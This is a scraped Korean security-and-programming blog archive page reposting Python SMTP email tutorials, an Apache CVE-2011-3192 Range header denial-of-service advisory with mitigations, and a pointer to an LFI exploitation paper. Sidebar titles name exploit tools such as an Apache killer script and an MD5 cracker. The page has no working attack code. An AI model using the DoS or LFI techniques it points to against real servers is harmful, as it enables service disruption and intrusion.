text = "Hi!\nHow are you?\nHere is the link you wanted:\nhttp://www.python.org"
html = """\
<html>
  <head></head>
  <body>
    <p>Hi!<br>
       How are you?<br>
       Here is the <a href="http://www.python.org">link</a> you wanted.
    </p>
  </body>
</html>
"""

# Record the MIME types of both parts - text/plain and text/html.
part1 = MIMEText(text, 'plain')
part2 = MIMEText(html, 'html')

# Attach parts into message container.
# According to RFC 2046, the last part of a multipart message, in this case
# the HTML message, is best and preferred.
msg.attach(part1)
msg.attach(part2)

# Send the message via local SMTP server.
s = smtplib.SMTP('localhost')
# sendmail function takes 3 arguments: sender's address, recipient's address
# and message to send - here it is sent as one string.
s.sendmail(me, you, msg.as_string())
s.quit()

[출처] http://docs.python.org/library/email-examples.html

저작자표시 비영리 변경금지

'Hello_World! > 애플추가_파이썬' 카테고리의 다른 글

파이썬 로그인 세션유지 (0)	2011.11.30
KillApachePy (0)	2011.11.30
Python - Sending Email using SMTP (0)	2011.10.05
Gmail의 SMTP를 이용한 메일 발송 (0)	2011.10.05
Web Shell Detection Using NeoPI (0)	2011.09.01

Posted by bitfox

Python - Sending Email using SMTP

Hello_World!/애플추가_파이썬 2011. 10. 5. 14:26

Simple Mail Transfer Protocol (SMTP) is a protocol which handles sending e-mail and routing e-mail between mail servers.

Python provides smtplib module which defines an SMTP client session object that can be used to send mail to any Internet machine with an SMTP or ESMTP listener daemon.

Here is a simple syntax to create one SMTP object which can later be used to send an email:

import smtplib

smtpObj = smtplib.SMTP( [host [, port [, local_hostname]]] )

Here is the detail of the parameters:

host: This is the host running your SMTP server. You can specifiy IP address of the host or a domain name like tutorialspoint.com. This is optional argument.
port: If you are providing host argument then you need to specifiy a port where SMTP server is listening. Usually this port would be 25.
local_hostname: If your SMTP server is running on your local machine then you can specify just localhost as of this option.

An SMTP object has an instance method called sendmail, which will typically be used to do the work of mailing a message. It takes three parameters:

The sender - A string with the address of the sender.
The receivers - A list of strings, one for each recipient.
The message - A message as a string formatted as specified in the various RFCs.

Example:

Here is a simple way to send one email using Python script. Try it once:

#!/usr/bin/python

import smtplib

sender = 'from@fromdomain.com'
receivers = ['to@todomain.com']

message = """From: From Person <from@fromdomain.com>
To: To Person <to@todomain.com>
Subject: SMTP e-mail test

This is a test e-mail message.
"""

try:
   smtpObj = smtplib.SMTP('localhost')
   smtpObj.sendmail(sender, receivers, message)         
   print "Successfully sent email"
except SMTPException:
   print "Error: unable to send email"

Here you have placed a basic e-mail in message, using a triple quote, taking care to format the headers correctly. An e-mails requires a From, To, and Subject header, separated from the body of the e-mail with a blank line.

To send the mail you use smtpObj to connect to the SMTP server on the local machine and then use the sendmail method along with the message, the from address, and the destination address as parameters (even though the from and to addresses are within the e-mail itself, these aren't always used to route mail).

If you're not running an SMTP server on your local machine, you can use smtplib client to communicate with a remote SMTP server. Unless you're using a webmail service (such as Hotmail or Yahoo! Mail), your e-mail provider will have provided you with outgoing mail server details that you can supply them, as follows:

smtplib.SMTP('mail.your-domain.com', 25)

Sending an HTML email using Python:

When you send a text message using Python then all the content will be treated as simple text. Even if you will include HTML tags in a text message, it will be displayed as simple text and HTML tags will not be formatted according to HTML syntax. But Python provides option to send an HTML message as actual HTML message.

While sending an email message you can specify a Mime version, content type and character set to send an HTML email.

Example:

Following is the example to send HTML content as an email. Try it once:

#!/usr/bin/python

import smtplib

message = """From: From Person <from@fromdomain.com>
To: To Person <to@todomain.com>
MIME-Version: 1.0
Content-type: text/html
Subject: SMTP HTML e-mail test

This is an e-mail message to be sent in HTML format

<b>This is HTML message.</b>
<h1>This is headline.</h1>
"""

try:
   smtpObj = smtplib.SMTP('localhost')
   smtpObj.sendmail(sender, receivers, message)         
   print "Successfully sent email"
except SMTPException:
   print "Error: unable to send email"

Sending Attachements as an e-mail:

To send an email with mixed content requires to set Content-type header to multipart/mixed. Then text and attachment sections can be specified within boundaries.

A boundary is started with two hyphens followed by a unique number which can not appear in the message part of the email. A final boundary denoting the email's final section must also end with two hyphens.

Attached files should be encoded with the pack("m") function to have base64 encoding before transmission.

Example:

Following is the example which will send a file /tmp/test.txt as an attachment. Try it once:

#!/usr/bin/python

import smtplib
import base64

filename = "/tmp/test.txt"

# Read a file and encode it into base64 format
fo = open(filename, "rb")
filecontent = fo.read()
encodedcontent = base64.b64encode(filecontent)  # base64

sender = 'webmaster@tutorialpoint.com'
reciever = 'amrood.admin@gmail.com'

marker = "AUNIQUEMARKER"

body ="""
This is a test email to send an attachement.
"""
# Define the main headers.
part1 = """From: From Person <me@fromdomain.net>
To: To Person <amrood.admin@gmail.com>
Subject: Sending Attachement
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary=%s
--%s
""" % (marker, marker)

# Define the message action
part2 = """Content-Type: text/plain
Content-Transfer-Encoding:8bit

%s
--%s
""" % (body,marker)

# Define the attachment section
part3 = """Content-Type: multipart/mixed; name=\"%s\"
Content-Transfer-Encoding:base64
Content-Disposition: attachment; filename=%s

%s
--%s--
""" %(filename, filename, encodedcontent, marker)
message = part1 + part2 + part3

try:
   smtpObj = smtplib.SMTP('localhost')
   smtpObj.sendmail(sender, reciever, message)
   print "Successfully sent email"
except Exception:
   print "Error: unable to send email"

[출처] http://www.tutorialspoint.com/python/python_sending_email.htm

저작자표시 비영리 변경금지

'Hello_World! > 애플추가_파이썬' 카테고리의 다른 글

KillApachePy (0)	2011.11.30
파이썬 v2.7.2 - email: Examples (0)	2011.10.05
Gmail의 SMTP를 이용한 메일 발송 (0)	2011.10.05
Web Shell Detection Using NeoPI (0)	2011.09.01
[md5 cracker] icrack (0)	2011.09.01

Posted by bitfox

Gmail의 SMTP를 이용한 메일 발송

Hello_World!/애플추가_파이썬 2011. 10. 5. 11:48

#!/usr/bin/env python
# Gmail SMTP script by joon
# Snippets from the following codes were used:
#  http://www.go4expert.com/forums/showthread.php?t=7567
#  http://docs.python.org/library/email-examples.html?highlight=sendmail
#  http://djkaos.wordpress.com/2009/04/08/python-gmail-smtp-send-email-script/
import smtplib
from email.mime.text import MIMEText
sender = 'sender@gmail.com'
recipients = 'toEmailAddress'
msg = MIMEText('Email Contents')
msg['Subject'] =  'Email Subject'
msg['From'] = sender
msg['To'] = recipients
smtpserver = 'smtp.gmail.com'
smtpuser = 'ID'         # set SMTP username here
smtppass = 'Password'   # set SMTP password here
session = smtplib.SMTP("smtp.gmail.com", 587)
session.ehlo()
session.starttls()
session.ehlo()
session.login(smtpuser, smtppass)
smtpresult = session.sendmail(sender, [recipients], msg.as_string())
if smtpresult:
  errstr = ""
  for recip in smtpresult.keys():
      errstr = """Could not delivery mail to: %s
Server said: %s
%s
%s""" % (recip, smtpresult[recip][0], smtpresult[recip][1], errstr)
  raise smtplib.SMTPException, errstr
session.close()
[출처] https://gist.github.com/840116#file_gmailsmtp.py








[주의] 본 자료는 연구용 및 학습자료로 사용하길 바라며, 악의적인 사용시 



사용자 본인에게 책임이 있음을 명시합니다.

저작자표시 비영리 변경금지

'Hello_World! > 애플추가_파이썬' 카테고리의 다른 글

파이썬 v2.7.2 - email: Examples (0)	2011.10.05
Python - Sending Email using SMTP (0)	2011.10.05
Web Shell Detection Using NeoPI (0)	2011.09.01
[md5 cracker] icrack (0)	2011.09.01
[자작쉘] http URL 긁어오기 (0)	2011.08.08

Posted by bitfox

Range header DoS vulnerability in Apache 1.3 and Apache 2

Hello_World!/인디언말_PHP 2011. 9. 18. 22:10

집에서 아파치 섭을 테스트 하는 과정에서 아파치 구 버젼에 대한 Denial Of Service를 테스트 해보았는데.. 가상 섭이라 그런지 크게 장애가 발생하지는 않았다. 하지만 공격코드를 어떻게 조합하느냐에 따라 큰 장애를 만들 수 있으니 패치 하시길 바랍니다.

[출처] http://marc.info/?l=apache-httpd-dev&m=131418828705324&w=2

List:       apache-httpd-dev
Subject:    Re: CVE-2011-3192: Range header DoS vulnerability in Apache 1.3 and Apache 2 (DRAFT-2)
From:       Dirk-Willem van Gulik <dirkx () webweaving ! org>
Date:       2011-08-24 12:17:32
Message-ID: 5E9A092C-A449-4318-8A31-FA0481EB04B7 () webweaving ! org
[Download message RAW]

* Updated with Rudigers comments.

* Do we have consensus that the deflate stuff needs to go out - is not relevant ?

* More Comments please. Esp. on the quality and realisticness of the mitigtions.

Thanks,

Title:     CVE-2011-3192: Range header DoS vulnerability in Apache 1.3 and Apache 2
Date:       20110824 1600Z
# Last Updated: 20110824 1600Z
Product:   Apache Web Server
Versions: Apache 1.3 all versions, Apache 2 all versions

Description:
------------

A denial of service vulnerability has been found in the way the multiple overlapping \
ranges are handled by apache (http://seclists.org/fulldisclosure/2011/Aug/175). It \
most commonly manifests itself when static content is made available with compression \
on the fly through mod_deflate - but other modules which buffer and/or generate \
content in-memory are likely to be affected as well.

This is a very common (the default right!?) configuration.

The attack can be done remotely and with a modest number of requests leads to very \
significant memory and CPU usage.

Active use of this tools has been observed in the wild.

There is currently no patch/new version of apache which fixes this vulnerability. \
This advisory will be updated when a long term fix is available. A fix is expected in \
the next 96 hours.

Mitigation:
------------

However are several immediate options to mitigate this issue until that time:

1) Use mod_headers to dis-allow the use of Range headers:

RequestHeader unset Range

Note that this may break certain clients - such as those used for
e-Readers and progressive/http-streaming video.

2) Use mod_rewrite to limit the number of ranges:

RewriteCond %{HTTP:range} ^bytes=[^,]+(,[^,]+){0,4}$
RewriteRule .* - [F]

3) Limit the size of the request field to a few hundred bytes. Note that while this
keeps the offending Range header short - it may break other headers; such as sizable
cookies or security fields.

LimitRequestFieldSize 200

Note that as the attack evolves in the field you are likely to have
to further limit this and/or impose other LimitRequestFields limits.

See: http://httpd.apache.org/docs/2.2/mod/core.html#limitrequestfieldsize

3) Deploy a Range header count module as a temporary stopgap measure:

http://people.apache.org/~dirkx/mod_rangecnt.c

4) If your server (only) server static content then disable compression-on-the-fly \
by:

1) removing mod_deflate as a loaded module and/or by removing any
AddOutputFilterByType/SetOutputFilter DEFLATE entries.

2) Disable it with "BrowserMatch .* no-gzip"

See: http://httpd.apache.org/docs/2.0/mod/mod_deflate.html
http://httpd.apache.org/docs/2.2/mod/mod_deflate.html

5) Apply any of the current patches under discussion - such as:

http://mail-archives.apache.org/mod_mbox/httpd-dev/201108.mbox/%3cCAAPSnn2PO-d-C4nQt_ \
TES2RRWiZr7urefhTKPWBC1b+K1Dqc7g@mail.gmail.com%3e

Actions:
--------
Apache HTTPD users are advised to investigate wether they are vulnerable (e.g. allow \
Range headers and use mod_deflate) and consider implementing any of the above \
mitigations.

Planning:
--------

This advisory will be updated when a fix/patch or new release is available. A patch \
or new apache release for Apache 2.0 and 2.2 is expected in the next 96 hours. Note \
that, while popular, Apache 1.3 is deprecated.

[주의] 본 자료는 연구용 및 학습 자료로 사용하길 바라며, 악의적인 사용시 사용자 본인에게 책임이 있음을 명시합니다.

저작자표시 비영리 변경금지

'Hello_World! > 인디언말_PHP' 카테고리의 다른 글

LFI With PHPInfo Assistance (0)	2011.09.14
Oddities of PHP file access in Windows®.Cheat-sheet. (0)	2011.09.14
php base64 (0)	2011.08.26
관리자 페이지 IP 제한 (0)	2011.08.11
Hello World in PHP (0)	2011.08.11

Posted by bitfox

LFI With PHPInfo Assistance

Hello_World!/인디언말_PHP 2011. 9. 14. 09:17

LFI 취약점에 대한 공략 방식을 잘 설명해 놓았다.
잘 인지하고 방어하자.

[출처 및 다운로드] exploit-DB & http://www.exploit-db.com/download_pdf/17799

[주의] 본 자료는 연구용 및 학습 자료로 사용하길 바라며, 악의적인 사용시 사용자 본인에게 책임이 있음을 명시합니다.

저작자표시 비영리 변경금지

'Hello_World! > 인디언말_PHP' 카테고리의 다른 글

Range header DoS vulnerability in Apache 1.3 and Apache 2 (0)	2011.09.18
Oddities of PHP file access in Windows®.Cheat-sheet. (0)	2011.09.14
php base64 (0)	2011.08.26
관리자 페이지 IP 제한 (0)	2011.08.11
Hello World in PHP (0)	2011.08.11

Posted by bitfox

◀ 이전페이지 1 2 3 다음페이지 ▶

暗行御史

'Hello_World!'에 해당되는 글 24건

Python threads - a first example

'Hello_World! > 애플추가_파이썬' 카테고리의 다른 글

[Remote Exploits] Java Applet Rhino Script Engine Remote Code Execution

'Hello_World! > 오라절친_JSP' 카테고리의 다른 글

파이썬 로그인 세션유지

'Hello_World! > 애플추가_파이썬' 카테고리의 다른 글

KillApachePy

'Hello_World! > 애플추가_파이썬' 카테고리의 다른 글

How ASP.NET Security Vulnerability affects Kentico CMS

'Hello_World! > 마소친구_ASP' 카테고리의 다른 글

파이썬 v2.7.2 - email: Examples

'Hello_World! > 애플추가_파이썬' 카테고리의 다른 글

Python - Sending Email using SMTP

Example:

Sending an HTML email using Python:

Example:

Sending Attachements as an e-mail:

Example:

'Hello_World! > 애플추가_파이썬' 카테고리의 다른 글

Gmail의 SMTP를 이용한 메일 발송

'Hello_World! > 애플추가_파이썬' 카테고리의 다른 글

Range header DoS vulnerability in Apache 1.3 and Apache 2

'Hello_World! > 인디언말_PHP' 카테고리의 다른 글

LFI With PHPInfo Assistance

'Hello_World! > 인디언말_PHP' 카테고리의 다른 글

최근에 올라온 글

공지사항

글 보관함

최근에 받은 트랙백

카테고리

달력

링크

티스토리툴바